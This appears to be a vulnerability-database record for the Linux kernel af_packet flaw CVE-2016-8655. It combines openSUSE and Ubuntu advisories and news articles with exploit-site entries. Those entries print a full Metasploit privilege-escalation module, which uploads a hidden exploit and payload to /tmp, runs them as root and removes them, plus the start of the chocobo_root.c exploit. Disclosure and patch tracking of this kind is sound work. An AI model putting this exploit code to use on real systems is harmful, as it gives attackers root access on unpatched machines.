leaks in cifs_do_mount() (bsc#799133).\n - fs/cifs: Move check for prefix path to within cifs_get_root()\n (bsc#799133).\n - fuse: Fixup buggy conflict resolution in\n patches.fixes/fuse-Propagate-dentry-down-to-inode_change_ok.patch.\n - genirq: Add untracked irq handler (bsc#1006827).\n - genirq: Use a common macro to go through the actions list (bsc#1006827).\n - gre: Disable segmentation offloads w/ CSUM and we are encapsulated via\n FOU (bsc#1001486).\n - gro: Allow tunnel stacking in the case of FOU/GUE (bsc#1001486).\n - hpsa: fallback to use legacy REPORT PHYS command (bsc#1006175).\n - hpsa: use bus '3' for legacy HBA devices (bsc#1010665).\n - hpsa: use correct DID_NO_CONNECT hostbyte (bsc#1010665).\n - hv: do not lose pending heartbeat vmbus packets (bnc#1006918).\n - i2c: designware-baytrail: Work around Cherry Trail semaphore errors\n (bsc#1011913).\n - i2c: xgene: Avoid dma_buffer overrun (bsc#1006576).\n - i40e: fix an uninitialized variable bug (bsc#969476 FATE#319648).\n - i40e: fix broken i40e_config_rss_aq function (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - i40e: Remove redundant memset (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i810: Enable Intel i810 audio driver used in OpenQA VMs.\n - Import kabi files for x86_64/default from 4.4.27-2.1\n - iommu/arm-smmu: Add support for 16 bit VMID (fate#319978).\n - iommu/arm-smmu: Workaround for ThunderX erratum #27704 (fate#319978).\n - ipmi_si: create hardware-independent softdep for ipmi_devintf\n (bsc#1009062).\n - kABI: protect struct mmc_packed (kabi).\n - kABI: protect struct mmc_packed (kabi).\n - kABI: reintroduce sk_filter (kabi).\n - kABI: reintroduce strtobool (kabi).\n - kABI: reintroduce strtobool (kabi).\n - kABI: restore ip_cmsg_recv_offset parameters (kabi).\n - kabi/severities: Ignore kABI for asoc Intel SST drivers (bsc#1010690)\n These drivers are self-contained, not for 3rd party drivers.\n - kernel-module-subpackage: Properly quote flavor in expressions That\n fixes a parse error if the flavor starts with a digit or contains other\n non-alphabetic characters.\n - kgr: ignore zombie tasks during the patching (bnc#1008979).\n - md/raid1: fix: IO can block resync indefinitely (bsc#1001310).\n - mm: do not use radix tree writeback tags for pages in swap cache\n (bnc#971975 VM performance -- swap).\n - mm/filemap: generic_file_read_iter(): check for zero reads\n unconditionally (bnc#1007955).\n - mm/mprotect.c: do not touch single threaded PTEs which are on the right\n node (bnc#971975 VM performance -- numa balancing).\n - net/mlx5: Add ConnectX-5 PCIe 4.0 to list of supported devices\n (bsc#1006809).\n - net: sctp, forbid negative length (bnc#1005921).\n - netvsc: fix incorrect receive checksum offloading (bnc#1006915).\n - overlayfs: allow writing on read-only btrfs subvolumes (bsc#1010158)\n - pci/ACPI: Allow all PCIe services on non-ACPI host bridges (bsc#1006827).\n - pci: Allow additional bus numbers for hotplug bridges (bsc#1006827).\n - pci: correctly cast mem_base in pci_read_bridge_mmio_pref()\n (bsc#1001888).\n - pci: pciehp: Allow exclusive userspace control of indicators\n (bsc#1006827).\n - pci: Remove return values from pcie_port_platform_notify() and relatives\n (bsc#1006827).\n - perf/x86: Add perf support for AMD family-17h processors (fate#320473).\n - powerpc/pseries: Use H_CLEAR_HPT to clear MMU hash table during kexec\n (bsc#1003813).\n - proc: much faster /proc/vmstat (bnc#971975 VM performance -- vmstat).\n - qede: Correctly map aggregation replacement pages (bsc#966318\n FATE#320158 bsc#966316 FATE#320159).\n - qed: FLR of active VFs might lead to FW assert (bsc#966318 FATE#320158\n bsc#966316 FATE#320159).\n - Reformat spec files according to the format_spec_file osc helper\n - Replace\n patches.kabi/kabi-hide-new-member-recursion_counter-in-struct-sk_.patch\n by patches.kabi/kabi-hide-bsc-1001486-changes-in-struct-napi_gro_cb.patch\n - Revert "ACPI / LPSS: allow to use specific PM domain during ->probe()"\n (bsc#1005917).\n - Revert "fix minor infoleak in get_user_ex()" (p.k.o).\n - REVERT fs/cifs: fix wrongly prefixed path to root (bsc#963655,\n bsc#979681)\n - Revert "x86/mm: Expand the exception table logic to allow new handling\n options" (p.k.o).\n - rpm/config.sh: Build against SP2 in the OBS as well\n - rpm/constraints.in: increase disk for kernel-syzkaller The\n kernel-syzkaller build now consumes around 30G. This causes headache in\n factory where the package rebuilds over and over. Require 35G disk size\n to successfully build the flavor.\n - rpm/kernel-binary.spec.in: Build the -base package unconditionally\n (bsc#1000118)\n - rpm/kernel-binary.spec.in: Do not create KMPs with CONFIG_MODULES=n\n - rpm/kernel-binary.spec.in: Only build -base and -extra with\n CONFIG_MODULES (bsc#1000118)\n - rpm/kernel-binary.spec.in: Simplify debug info switch Any\n CONFIG_DEBUG_INFO sub-options are answered in the configs nowadays.\n - rpm/kernel-spec-macros: Ignore too high rebuild counter (bsc#1012060)\n - rpm/mkspec: Read a default release string from rpm/config.sh (bsc997059)\n - rpm/package-descriptions: Add 64kb kernel flavor description\n - rpm/package-descriptions: add kernel-syzkaller\n - rpm/package-descriptions: pv has been merged into -default (fate#315712)\n - rpm/package-descriptions: the flavor is 64kb, not 64k\n - sched/core: Optimize __schedule() (bnc#978907 Scheduler performance --\n context switch).\n - sched/fair: Optimize find_idlest_cpu() when there is no choice\n (bnc#978907 Scheduler performance -- idle search).\n - supported.conf: Add overlay.ko to -base (fate#321903) Also, delete the\n stale entry for the old overlayfs.\n - supported.conf: Mark vmx-crypto as supported (fate#319564)\n - tg3: Avoid NULL pointer dereference in tg3_io_error_detected()\n (bsc#963609 FATE#320143).\n - usbhid: add ATEN CS962 to list of quirky devices (bsc#1007615).\n - Whitelist KVM KABI changes resulting from adding a hcall. caused by\n 5246adec59458b5d325b8e1462ea9ef3ead7f6ae powerpc/pseries: Use\n H_CLEAR_HPT to clear MMU hash table during kexec No problem is expected\n as result of changing KVM KABI so whitelisting for now. If we get some\n additional input from IBM we can back out the patch.\n - writeback: initialize inode members that track writeback history\n (bsc#1012829).\n - x86/apic: Order irq_enter/exit() calls correctly vs. ack_APIC_irq()\n (bsc#1013479).\n - x86/efi: Enable runtime call flag checking (bsc#1005745).\n - x86/efi: Move to generic {__,}efi_call_virt() (bsc#1005745).\n - x86/mce/AMD, EDAC/mce_amd: Define and use tables for known SMCA IP types\n (fate#320474, bsc#1013700). Exclude removed symbols from kABI check.\n They're AMD Zen relevant only and completely useless to other modules -\n only edac_mce_amd.ko.\n - x86/mce/AMD: Increase size of the bank_map type (fate#320474,\n bsc#1013700).\n - x86/mce/AMD: Read MSRs on the CPU allocating the threshold blocks\n (fate#320474, bsc#1013700).\n - x86/mce/AMD: Update sysfs bank names for SMCA systems (fate#320474,\n bsc#1013700).\n - x86/mce/AMD: Use msr_ops.misc() in allocate_threshold_blocks()\n (fate#320474, bsc#1013700).\n - x86/PCI: VMD: Attach VMD resources to parent domain's resource tree\n (bsc#1006827).\n - x86/PCI: VMD: Document code for maintainability (bsc#1006827).\n - x86/PCI: VMD: Fix infinite loop executing irq's (bsc#1006827).\n - x86/PCI: VMD: Initialize list item in IRQ disable (bsc#1006827).\n - x86/PCI: VMD: Request userspace control of PCIe hotplug indicators\n (bsc#1006827).\n - x86/PCI: VMD: Select device dma ops to override (bsc#1006827).\n - x86/PCI: VMD: Separate MSI and MSI-X vector sharing (bsc#1006827).\n - x86/PCI: VMD: Set bus resource start to 0 (bsc#1006827).\n - x86/PCI: VMD: Use lock save/restore in interrupt enable path\n (bsc#1006827).\n - x86/PCI/VMD: Use untracked irq handler (bsc#1006827).\n - x86/PCI: VMD: Use x86_vector_domain as parent domain (bsc#1006827).\n - xen/gntdev: Use VM_MIXEDMAP instead of VM_IO to avoid NUMA balancing\n (bnc#1005169).\n - zram: Fix unbalanced idr management at hot removal (bsc#1010970).\n\n", "modified": "2016-12-08T13:08:00", "published": "2016-12-08T13:08:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00026.html", "id": "OPENSUSE-SU-2016:3050-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:36:59", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-3", "href": "https://ubuntu.com/security/notices/USN-3151-3", "title": "Linux kernel (Qualcomm Snapdragon) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:35:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-4", "href": "https://ubuntu.com/security/notices/USN-3151-4", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3150-1", "href": "https://ubuntu.com/security/notices/USN-3150-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 6, "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "USN-3150-2", "href": "https://ubuntu.com/security/notices/USN-3150-2", "title": "Linux kernel (OMAP4) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:30:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3152-1", "href": "https://ubuntu.com/security/notices/USN-3152-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:49", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-1", "href": "https://ubuntu.com/security/notices/USN-3151-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "USN-3151-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nPhilip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3151-2", "href": "https://ubuntu.com/security/notices/USN-3151-2", "title": "Linux kernel (Xenial HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "USN-3149-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 LTS.\n\nPhilip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3149-2", "href": "https://ubuntu.com/security/notices/USN-3149-2", "title": "Linux kernel (Trusty HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "id": "USN-3149-1", "href": "https://ubuntu.com/security/notices/USN-3149-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:29:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Philip Pettersson discovered a race condition in the af_packet \nimplementation in the Linux kernel. A local unprivileged attacker could use \nthis to cause a denial of service (system crash) or run arbitrary code with \nadministrative privileges.", "edition": 5, "modified": "2016-12-06T00:00:00", "published": "2016-12-06T00:00:00", "id": "USN-3152-2", "href": "https://ubuntu.com/security/notices/USN-3152-2", "title": "Linux kernel (Raspberry Pi 2) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:58", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655"], "description": "[](<https://3.bp.blogspot.com/-SSKEkSYFPlI/WEg1PB5oNjI/AAAAAAAAqe0/GArieXp2QPgbMiiIN0hTVEp7YmTypEnGQCLcB/s1600/linux-kernel-local-root-exploit.png>)\n\nA 5-year-old serious privilege-escalation vulnerability has been discovered in Linux kernel that affects almost every distro of the Linux operating system, including Redhat, and Ubuntu. \n \nOver a month back, a nine-year-old privilege-escalation vulnerability, dubbed \"[Dirty COW](<https://thehackernews.com/2016/10/linux-kernel-exploit.html>),\" was discovered in the Linux kernel that affected every distro of the open-source operating system, including Red Hat, Debian, and Ubuntu. \n \nNow, another Linux kernel vulnerability ([CVE-2016-8655](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655>)) that dates back to 2011 [disclosed](<http://seclists.org/oss-sec/2016/q4/607>) today could allow an unprivileged local user to gain root privileges by exploiting a race condition in the af_packet implementation in the Linux kernel. \n \nPhilip Pettersson, the researcher who discovered the flaw, was able to create an [exploit to gain a root shell](<https://www.exploit-db.com/exploits/40871/>) on an Ubuntu 16.04 LTS system (Linux Kernel 4.4) and also defeated SMEP/SMAP (Supervisor Mode Execution Prevention/Supervisor Mode Access Prevention) protection to gain kernel code execution abilities. \n \nIn other words, a local unprivileged attacker can use this exploit to cause a denial of service (crashing server) or run arbitrary malicious code with administrative privileges on the targeted system. \n\n\n> \"_A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer_,\" Red Hat [security advisory](<https://access.redhat.com/security/cve/cve-2016-8655>) explains. \n\n> \"_A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system._\"\n\nThis threat creates a potential danger for service providers to have their servers crashed or hacked through this Linux kernel vulnerability. \n \n_\"On Android, processes with gid=3004/AID_NET_RAW are able to create AF_PACKET sockets (mediaserver) and can trigger the bug,\" _Pettersson explains. \n \nThe vulnerability was patched in the mainline kernel last week, so users are advised to update their Linux distro as soon as possible.\n", "modified": "2016-12-07T16:14:04", "published": "2016-12-07T04:41:00", "id": "THN:04F5FC12455795F06BC21F5C803FA77E", "href": "https://thehackernews.com/2016/12/linux-kernel-local-root-exploit.html", "type": "thn", "title": "5-Year-Old Linux Kernel Local Privilege Escalation Flaw Discovered", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:24", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655", "CVE-2017-6074"], "description": "[](<https://3.bp.blogspot.com/-MlWxlllb_uQ/WK3ToXZjodI/AAAAAAAArdY/TIkjV9A0VUc-XH40OE8oYELAR8hxzvgLwCLcB/s1600/linux-kernel-local-root-exploit.png>)\n\nAnother privilege-escalation vulnerability has been discovered in Linux kernel that dates back to 2005 and affects major distro of the Linux operating system, including Redhat, Debian, OpenSUSE, and Ubuntu.\n\n \nOver a decade old Linux Kernel bug ([CVE-2017-6074](<https://www.suse.com/support/kb/doc?id=7018645>)) has been discovered by security researcher Andrey Konovalov in the DCCP (Datagram Congestion Control Protocol) implementation using [Syzkaller](<https://github.com/google/syzkaller>), a kernel fuzzing tool released by Google. \n \nThe vulnerability is a use-after-free flaw in the way the Linux kernel's \"DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket.\" \n \nThe DCCP double-free vulnerability could allow a local unprivileged user to alter the Linux kernel memory, enabling them to cause a denial of service (_system crash_) or escalate privileges to gain administrative access on a system. \n\n\n> \"An attacker can control what object that would be and overwrite its content with arbitrary data by using some of the kernel heap spraying techniques. If the overwritten object has any triggerable function pointers, an attacker gets to execute arbitrary code within the kernel,\" full disclosure [mailing list](<http://seclists.org/oss-sec/2017/q1/471>) about the vulnerability reads.\n\nDCCP is a message-oriented transport layer protocol that minimizes the overhead of packet header size or end-node processing as much as possible and provides the establishment, maintenance and teardown of an unreliable packet flow, and the congestion control of that packet flow. \n \nThis vulnerability does not provide any way for an outsider to break into your system in the first place, as it is not a remote code execution (RCE) flaw and require an attacker to have a local account access on the system to exploit the flaw. \n \nAlmost two months ago, a similar [privilege-escalation vulnerability](<https://thehackernews.com/2016/12/linux-kernel-local-root-exploit.html>) (CVE-2016-8655) was uncovered in Linux kernel that dated back to 2011 and allowed an unprivileged local user to gain root privileges by exploiting a race condition in the af_packet implementation in the Linux kernel. \n \nThe vulnerability has already been patched in the [mainline kernel](<https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4>). So, if you are an advanced Linux user, apply the patch and rebuild kernel yourself. \n \nOR, you can wait for the next kernel update from your distro provider and apply it as soon as possible.\n", "modified": "2017-02-22T18:08:51", "published": "2017-02-22T07:08:00", "id": "THN:11E7CC33794D9968747131F3F0AE8716", "href": "https://thehackernews.com/2017/02/linux-kernel-local-root.html", "type": "thn", "title": "11-Year Old Linux Kernel Local Privilege Escalation Flaw Discovered", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-05-23T02:47:16", "description": "This Metasploit module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled and two or more CPU cores. Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation may crash the kernel. This Metasploit module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel versions 4.4.0-45-generic and 4.4.0-51-generic.", "edition": 1, "published": "2018-05-23T00:00:00", "title": "Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-05-23T00:00:00", "id": "1337DAY-ID-30429", "href": "https://0day.today/exploit/description/30429", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n \r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a race condition and use-after-free in the\r\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\r\n the Linux kernel to execute code as root (CVE-2016-8655).\r\n \r\n The bug was initially introduced in 2011 and patched in 2016 in version\r\n 4.4.0-53.74, potentially affecting a large number of kernels; however\r\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\r\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\r\n Linux Mint.\r\n \r\n The target system must have unprivileged user namespaces enabled and\r\n two or more CPU cores.\r\n \r\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\r\n may crash the kernel.\r\n \r\n This module has been tested successfully on Linux Mint 17.3 (x86_64);\r\n Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\r\n versions 4.4.0-45-generic and 4.4.0-51-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rebel', # Discovery and chocobo_root.c exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Aug 12 2016',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'chocobo_root.c' ],\r\n [ 'EDB', '40871' ],\r\n [ 'CVE', '2016-8655' ],\r\n [ 'BID', '94692' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\r\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\r\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\r\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\r\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n \r\n def timeout\r\n datastore['TIMEOUT'].to_i\r\n end\r\n \r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n \r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n end\r\n \r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n \r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n \r\n gcc_cmd = \"gcc -o #{path} #{path}.c -lpthread\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n rm_f \"#{path}.c\"\r\n \r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n \r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n \r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n \r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n \r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n \r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n \r\n def check\r\n version = kernel_release\r\n unless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} is vulnerable\"\r\n \r\n arch = kernel_hardware\r\n unless arch.include? 'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n \r\n cores = get_cpu_info[:cores].to_i\r\n min_required_cores = 2\r\n unless cores >= min_required_cores\r\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System has #{cores} CPU cores\"\r\n \r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n \r\n CheckCode::Appears\r\n end\r\n \r\n def exploit\r\n if check != CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n \r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n \r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n \r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('chocobo_root.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('chocobo_root')\r\n end\r\n \r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n \r\n # Launch exploit\r\n print_status \"Launching exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\r\n rm_f executable_path\r\n rm_f payload_path\r\n end\r\nend\n\n# 0day.today [2018-05-23] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30429"}, {"lastseen": "2018-04-09T16:54:48", "edition": 1, "description": "Linux AF_PACKET race condition exploit for Ubuntu 16.04 x86_64.", "published": "2016-12-07T00:00:00", "title": "Linux Kernel 4.4.0 AF_PACKET Race Condition / Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2016-12-07T00:00:00", "href": "https://0day.today/exploit/description/26493", "id": "1337DAY-ID-26493", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit\r\nexploit for Ubuntu 16.04 x86_64\r\n \r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n[email\u00a0protected]:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n[email\u00a0protected]:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\n[email\u00a0protected]:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\n[email\u00a0protected]:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit 